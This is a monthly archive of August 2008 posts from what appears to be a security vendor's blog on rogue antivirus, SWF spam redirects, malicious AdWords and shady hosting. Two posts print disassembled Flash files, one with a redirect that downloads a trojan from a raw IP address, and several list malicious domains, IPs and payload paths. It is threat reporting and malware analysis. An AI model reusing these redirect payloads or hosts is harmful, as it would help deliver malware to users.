Month: August 2008

Using Microsoft’s Log Parser

If you’re interested in forensics or log file analysis, Dave Kleiman has posted some useful information on using Microsoft’s Log Parser in forensics. As Dave says:

What is Log Parser? Microsoft’s Log Parser is perhaps the most underutilized and unknown tool for Microsoft OS’s. With this tool, retrieving vital information becomes a treat instead of a task. The tool is freely available from Microsoft.

You can download Log Parser here. Dave has a wealth of materials here on his website, and a specific presentation on using Log Parser here (rar file).

While Dave’s focus is on forensics, Log Parser is useful for all kinds of things, as it provides universal query access to log files, csv files, etc.

Alex Eckelberry

The audacity of Atrivo

From Brian Krebs today:

The portions of Atrivo most heavily used by RBN were Hostfresh — which provides routing for Atrivo through Hong Kong and China — and UkrTeleGroup (also known as Inhoster) out of Ukraine. These two networks remain core components of Atrivo’s operation, and recent data suggests the company’s reputation for supporting online criminals hasn’t diminished since the disappearance of the RBN last year. As of last December, Atrivo boasted the largest concentration of malicious activity of any hosting company, according to a report released by security intelligence firm iDefense.

“While Intercage has legitimate clients and professes intolerance for abuse, it continues to turn a blind eye to massive amounts of cyber crime,” iDefense analysts wrote. “Intercage Inc. previously operated as Atrivo Inc.; it was already infamous for abuse then and has not improved its reputation since changing names.”

Emil Kacperski, Atrivo’s founder, said he has been trying to clean up the company’s image.

“I work very hard to make sure that everything is kept at bay,” Kacperski said in an e-mail to Security Fix. “Unfortunately as you can understand being a dedicated server provider there isn’t a way for us to control the content on the servers. We can only respond to abuse reports and then proceed to shut down a server or take other action.”

Yeah. Right.

Alex Eckelberry

A lot of swf files…

Follow-up from my blog post yesterday on SWF files being used in spam: One researcher has shared with me a little over 800 SWF files on ImageShack, all pushing malware.  I did a quick spot check and many of these are still live. I have been told that ImageShack has been notified.   I hope they get this stuff down fast.

Imageshacksw3er12388

Swfimage123881238a

I did get a reader who was a bit confused about this, so just to make it clear: These SWF files include a simple redirect that pops-up a dialog to install a piece of malware from a different location.  You actually have to click “Run” to execute the malware.

Alex Eckelberry

New rogue security product: Total Secure 2009

Total Secure 2009 is a new rogue security product from IEDefender family

Totalsecure2009

The Trojan from the site Getneededsoftware. com installs a malicious BHO which is responsible for advertising the new rogue product

O2 – BHO: RupTool – {F32B24F1-25FA-4A91-9F97-5272B3CE8FCA} – C:WINDOWSsystem32xdaszt.dll

Total Secure 2009 Home page

IP: 91.203.92.98
Totalsecure2009. com
Totalsecure

Typical fake/Scare scan page

IP:77.244.220.141
checksystem-online. com
Totalsecure scaner

Detection by existing antivirus engines on this one is really poor

Additional sites assosiated with this scam

Secure-order-box. com
Gettotalsec2008. com
Getdefender2009. com

Bharath M N

Folks, this is the new wave: SWF file redirects continue

In an earlier blog post, I mentioned that spammers are now using Shockwave Flash (SWF) files to avoid detection (similar in nature to the trick of using Google redirects, etc. in the past).

This continues. Here’s a current example:

Flashfile1238812312312388

This is a typical spam you see these days, pushing an install of trojan that, if installed, typically downloads a rogue malicious antispyware program.

Clicking on the link takes us to a SWF file hosted on ImageShack:

Flashfile1238812312312388a

As you can see, it’s just junk text displaying. It’s entire purpose is to push the download of that install.exe file (the trojan).

If we take a wee peek inside that SWF file, we see what’s going on:

movie ‘mal.swf’ compressed // flash 6, total frames: 3, frame rate: 50 fps, 978×580 px

// unknown tag 777 length 3

exportAssets
1 as ‘arial’
end // of exportAssets

exportAssets
2 as ‘line1’
end // of exportAssets

exportAssets
3 as ‘line2’
end // of exportAssets

exportAssets
4 as ‘line3’
end // of exportAssets

defineMovieClip 5 // total frames: 1

end // of defineMovieClip 5

exportAssets
5 as ‘TextBox’
end // of exportAssets

frame 1

constants ‘http://89 187 49 18/install exe’, ‘_self’
push ‘http://89 187 49 18/install exe’, ‘_self’
getURL2
end // of frame 1

frame 2
stop
end // of frame 2
end

So the malware authors have a nice place to redirect from — a file hosted on Imageshack.

Alex Eckelberry

XP Antivirus 2008 now with sploits, Google Adwords affected

I’ve blogged before about the problem of Google Adwords pushing Antivirus XP Antivirus 2008. The situation is still ongoing.

However, it’s taken a turn for the worse, as these XP Antivirus pages are pushing exploits to install malware on the users system.

This will also affect the many syndicators of Google Adwords.

Google-results-bestav2009

Download-com-google-add

Bestav2009-with-sploit

Page-withscode

URLs involved in this particular event:

bestantivirus2009 com

iframe with exploits: huytegygle com/index.php <–script

There are a variety of exploits being used, including setslice and an AOL IM exploit. Unusually, an exploit framework is not being used. Fully patched systems will not be affected by these exploits.

The exploit attempts to install the following malicious file: huytegygle com/bin/ file.exe.

(Obviously, don’t visit these URLs unless you know what you’re doing, or you could be an unhappy camper.)

Alex Eckelberry

Recent news at Sunbelt

I’m duty-bound to report some recent news here at Sunbelt:

OEM deal:

Dakota Software Announces Technology Licensing Agreement with Sunbelt Software for Comprehensive Email Security Solution:
Innovative VIPRE Anti-malware Technology Is Core of New Email Protection Suite.

And a great new hire:

Sunbelt Software Appoints Director of International Sales: John-Erich Mantius To Drive WorldWide Sales Strategy

Alex Eckelberry

11 worst ideas in security. And finally, the truth comes out.

(Thanks to Larry Seltzer for this one)

What a wonderful list. It starts with this wonderful gem of truth and goes on down from there:

11. Security Industry and Market Analysts (I am become analyst, the destroyer of markets)

Those bastions of knowledge, defenders of the objective faith, and creators of 2-page, in depth, market analysis reports. They don’t actually analyze security they analyze the security market, they say cool things like “By the end of 2007, 75% of enterprises will be infected with undetected, financially motivated, targeted malware that evaded their traditional perimeter and host defenses.” and come up with amusing names and acronyms, (did you know that NBA – Network Behavior Analysis – was at one time called NADS – Network Anomaly Detection System – you can imagine the fun Gartner could of had with an overview of the NADS market). I spent years as an analyst myself and I loved my time, but I will always regret that analysts never actually test, demo, or even interact with the technology they so confidently and assertively write about.

That last sentence: “I will always regret that analysts never actually test, demo, or even interact with the technology they so confidently and assertively write about.”

I suspect there are a lot of enterprise customers out there who don’t know that analysts, for the most part, never play with the products they recommend. They view vendor Powerpoints and talk to customers, vendors, and the like. Who wins? Probably the vendor with the best Powerpoint, the best relationship with the analyst, and the most willingness to pay for analyst research.

Whatever. More here.

Alex Eckelberry

Another Zango-lovin’ site

Softwareheadlines.com pushing Zango…

Hey, why not put up some content, then force users to install Zango to get content that they can otherwise freely obtain on The Internets?  Awesome!

Zango2382348288234

If you click “cancel”, you get to view the page, making that popup a complete lie (it also appears that when the dialog comes up asking if you’re sure you don’t want Zango, clicking “OK” to install Zango actually doesn’t do that — and you also get to view the site for free).

The text posted is, for all I know, scraped from other blogs (I don’t know that, but I wouldn’t be surprised). 

Alex Eckelberry

The continuing problem of malware being advertised in Google Adwords

Google continues to have a problem with malware being advertised in Google Adwords, in this case, for the trojan Antivirus XP 2008.

Examples:

Antivirusads88234888

and

Antivirusxp123818123

Antivirusxp123818123a

An exacerbating part of the problem, of course, is that Google Adwords are massively syndicated to other sites, including heavy-hitters like CNET, all of whom may unknowingly push malware through these ads. A lot of people can get affected by this type of problem.

Alex Eckelberry

Isn’t this kind of click fraud?

Marketing uber-guru Seth Godin blogs:

Ads are the new online tip jar

“I never click on ads.”

It’s almost a badge of honor to say that. The subtext is, “I’m too smart/busy to waste my time doing that,” or perhaps, “I don’t want someone to sell my attention.”

But the real effect is that you’re starving great content.

I can say this because there are no ads here but,

If you like what you’re reading, click an ad to say thanks.

Pretty simple, but not an accepted online protocol, at least not yet.

If every time you read a blog post or bit of online content you enjoyed you clicked on an ad to say thanks, the economics of the web would change immediately. You don’t have to buy anything (though it’s fine if you do). You just have to honor the writer by giving them a click.

You still get what you pay for, even if you pay with attention.

Link here.

So advertisers will now have to adjust their economics to deal with meaningless clicks whenever someone wants to give a nod to a blog they like?

Not sure I like this idea.

Alex Eckelberry

Seen in the wild: Spam using swf files to avoid detection

Swfspam1238123888

Dissasembled, the output is actually this:

movie ‘spammed.swf’ compressed // flash 6, total frames: 136, frame rate: 12 fps, 1×1 px

// unknown tag 88 length 78

frame 14
getURL hxxp://moyapodruzhka. com/?wmid=44&sid=44′ ”
end // of frame 14
end

(Simply a redirect to a Russian porn site.)

Alex Eckelberry

Continuing creativity in trojan distribution

We’ve seen the same trojan being sent to inboxes in all kinds of ways — and seemingly obsessively on the subject of Angelina Jolie. Minor shift, now they’re putting the fake codec window right in the spam.

Angelina123812388

Pushes video.avi.exe, a fake alert trojan which invariably installs Antivirus XP 2008 or some such rogue security program.

Alex Eckelberry